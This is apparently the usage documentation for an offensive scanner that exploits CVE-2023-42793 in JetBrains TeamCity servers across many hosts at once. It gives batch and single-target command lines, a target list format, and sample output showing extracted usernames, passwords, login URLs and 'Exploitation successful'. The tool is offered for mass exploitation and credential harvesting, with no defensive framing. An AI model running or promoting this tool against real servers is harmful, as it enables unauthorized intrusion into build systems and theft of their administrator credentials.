
Batch vulnerability scanner for CVE-2023-42793 targeting JetBrains TeamCity servers. Automates credential extraction and login URL discovery across multiple hosts.
# Batch scan
python teamcity_scan.py -f targets.txt -o results.txt
# Single target
python teamcity_scan.py -u http://target.com:8111 -o result.txt
# Specify thread count
python teamcity_scan.py -f urls.txt -t 20 -o vuln.txt
Target file format (targets.txt):
http://192.168.1.100:8111
https://teamcity.example.com
10.0.0.1:8111
example.com
Output format (results.txt):
Target: http://192.168.1.100:8111
Username: TeamCityUser1234
Password: TeamCity@2023
Login URL: http://192.168.1.100:8111/login.html
Status: Exploitation successful